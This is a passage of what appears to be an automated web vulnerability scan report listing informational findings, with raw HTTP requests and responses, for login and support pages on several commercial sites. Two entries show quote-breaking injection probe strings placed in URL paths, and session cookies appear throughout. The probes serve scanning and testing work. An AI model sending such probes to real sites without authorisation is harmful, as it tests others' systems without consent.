User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=; path=/
Set-Cookie: KronosCust=LogIn=false; path=/
Set-Cookie: ASPSESSIONIDQASQRRDR=GKMMPBCAFDPKJBLLDIIBOHPD; path=/
Cache-control: private

31.9. https://employer.unicru.com/asp/home/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://employer.unicru.com
Path:   /asp/home/login.asp

Request

GET /asp/home/login.asp HTTP/1.1
Host: employer.unicru.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
webservername: 42vm
Content-Length: 3592
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSRCBTSB=MCAKPIJCNPCBKCIMDMJHBHMD; path=/
Cache-control: private
Set-Cookie: KTMDWestLB=993264394.20736.0000; path=/


<html>
   <head>
       <title>Unicru: Employer's Desktop Log In</title>
       <style type="text/css">
       <!--
       .content {FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #666666; FONT-FAMILY: verdana, san-
...[SNIP]...
31.10. https://forms.netsuite.com/pages/portal/page_not_found.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /pages/portal/page_not_found.jsp

Request

GET /pages/portal/page_not_found.jsp?internal=F HTTP/1.1
Host: forms.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:16 GMT
Server: Apache
NS_RTIMER_COMPOSITE: -354339471:616363742D6A6176613035312E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=953
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11320


<html><head><title>NetSuite | Page Not Found</title>
<meta name="robots" content="noindex,nofollow">
<link rel="STYLESHEET" type="text/css" href="/pages/portal/css/main.css">
</head>
<body bgcolor
...[SNIP]...
31.11. https://hourly.deploy.com/hmc/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/

Request

GET /hmc/report/ HTTP/1.1
Host: hourly.deploy.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:30 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=d8308cb242bf2b615f7a;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:39:30 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:39:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4789


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
31.12. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Request

GET /hmc/report/index.cfm HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:28 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:28 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
31.13. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

Request

GET /hmc/report/index.cfm/%22ns=%22netsparker(0x000042) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:52 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
31.14. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

Request

GET /hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:55 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:55 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
31.15. https://secure.trust-guard.com/certificates/Trust-Guard.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /certificates/Trust-Guard.com

Request

GET /certificates/Trust-Guard.com HTTP/1.1
Host: secure.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rphnh41r6qngg9nd1ml443go23; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:41:03 GMT
Server: Apache/2.2.3 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11261

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
31.16. https://secure.trust-guard.com/certificates/www.YourSite.Com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /certificates/www.YourSite.Com

Request

GET /certificates/www.YourSite.Com HTTP/1.1
Host: secure.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rphnh41r6qngg9nd1ml443go23; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:41:03 GMT
Server: Apache/2.2.3 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11274

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
31.17. https://secure.trust-guard.com/certificates/www.yourwebsitehere.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /certificates/www.yourwebsitehere.com

Request

GET /certificates/www.yourwebsitehere.com HTTP/1.1
Host: secure.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rphnh41r6qngg9nd1ml443go23; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:41:03 GMT
Server: Apache/2.2.3 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 7860
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...
31.18. https://secure.trust-guard.com/searchForm.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /searchForm.php

Request

GET /searchForm.php HTTP/1.1
Host: secure.trust-guard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rphnh41r6qngg9nd1ml443go23; __utma=147269874.1166530582.1303748966.1303748966.1303748966.1; __utmc=147269874; __utmb=147269874.7.10.1303748966;

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:40:54 GMT
Server: Apache/2.2.3 (CentOS)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 1747
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<me
...[SNIP]...
31.19. https://store.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /

Request

GET / HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: http://www.manageengine.com/products/applications_manager/application-performance-management.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.10.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:43 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:56:23 GMT
ETag: "4d5bdaa-12c1f-4a1bc0eea43c0"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:13:43 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 76831

<html><!-- InstanceBegin template="/Templates/store.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>ManageEngine Store</title>
<!-- InstanceEndEdi
...[SNIP]...
31.20. https://store.manageengine.com/service-desk/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /service-desk/index.html

Request

GET /service-desk/index.html HTTP/1.1
Host: store.manageengine.com
Connection: keep-alive
Referer: https://store.manageengine.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.13.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:14:05 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 11:59:05 GMT
ETag: "4d5be12-745c-4a16c77c85440"
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Expires: Tue, 24 Apr 2012 12:14:05 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29788

<html><!-- InstanceBegin template="/Templates/store.dwt" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>ManageEngine ServiceDesk Plus tore</title>
<!-
...[SNIP]...
31.21. https://support.comodo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /

Request

GET / HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:47:08 GMT
Server: Apache
Set-Cookie: SWIFT_sessionid40=3cdw2l8ir5jntocrfhfyvrg8o00usui3; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 31683

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
31.22. https://support.comodo.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Request

POST /index.php HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://support.comodo.com/
Cache-Control: max-age=0
Origin: https://support.comodo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid40=1g4f03q2uixdg6t4rvkbe9weba00vg2a
Content-Length: 70

loginemail=&loginpassword=&Submit2=Login&_m=core&_a=login&querystring=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:47:50 GMT
Server: Apache
Set-Cookie: SWIFT_loginemail=deleted; expires=Sun, 25-Apr-2010 19:47:49 GMT; path=/
Set-Cookie: SWIFT_loginpassword=deleted; expires=Sun, 25-Apr-2010 19:47:49 GMT; path=/
Content-Length: 917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Refresh" content="1; URL=index.php?loginresult=-5&amp;group=comodo">

<!-- default s
...[SNIP]...
31.23. https://support.trust-guard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /

Request

GET / HTTP/1.1
Host: support.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303748966.1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:58:36 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_sessionid40=6wpcfc08xikijf34l3vxhi68m4979l9c; path=/
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 14136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
31.24. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /index.php

Request

GET /index.php HTTP/1.1
Referer: https://support.trust-guard.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:05 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 14168


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
31.25. https://support.trust-guard.com/visitor/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/

Request

GET /visitor/ HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=htmlcode&departmentid=0&fullname=&email=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:59:13 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_visitor=a%3A1%3A%7Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; path=/
Content-Type: text/html
Content-Length: 0

31.26. https://support.trust-guard.com/visitor/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.trust-guard.com
Path:   /visitor/index.php

Request

GET /visitor/index.php?_m=livesupport&_a=chatfooterframe&sessionid= HTTP/1.1
Referer: https://support.trust-guard.com/visitor/index.php?_m=livesupport&_a=startclientchat&sessionid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:00:03 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 2445

<html>
<head>
<title>Trust Guard - by Kayako SupportSuite v3.60.04</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- default stylesheet -->
<link rel="stylesheet" type="
...[SNIP]...
31.27. https://system.netsuite.com/pages/customerlogin.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /pages/customerlogin.jsp

Request

GET /pages/customerlogin.jsp HTTP/1.1
Host: system.netsuite.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744342|PC#1303736347554-914602.17#1366814482|check#true#1303742542

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:13 GMT
Server: Apache
NS_RTIMER_COMPOSITE: 2015151527:616363742D6A6176613036392E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=661
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 49795


<!-- hosted from '/US/' on a.j69.sv running 2010.2.0.159 -->
<html>
<head>
<title>NetSuite - Customer Login</title>
<meta name="description" content="NetSuite provides a login page for
...[SNIP]...
31.28. https://www.depthsecurity.com/company.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /company.aspx

Request

GET /company.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/contact-us.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5736
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 15:13:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<html>
<head>
<tit
...[SNIP]...
31.29. https://www.depthsecurity.com/contact-us.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /contact-us.aspx

Request

GET /contact-us.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303735972.2.2.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303735972.2; __utmc=5781286; __utmb=5781286.2.10.1303735972

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11987
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 13:10:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
31.30. https://www.depthsecurity.com/professional-services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.depthsecurity.com
Path:   /professional-services.aspx

Request

GET /professional-services.aspx HTTP/1.1
Host: www.depthsecurity.com
Connection: keep-alive
Referer: https://www.depthsecurity.com/services.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
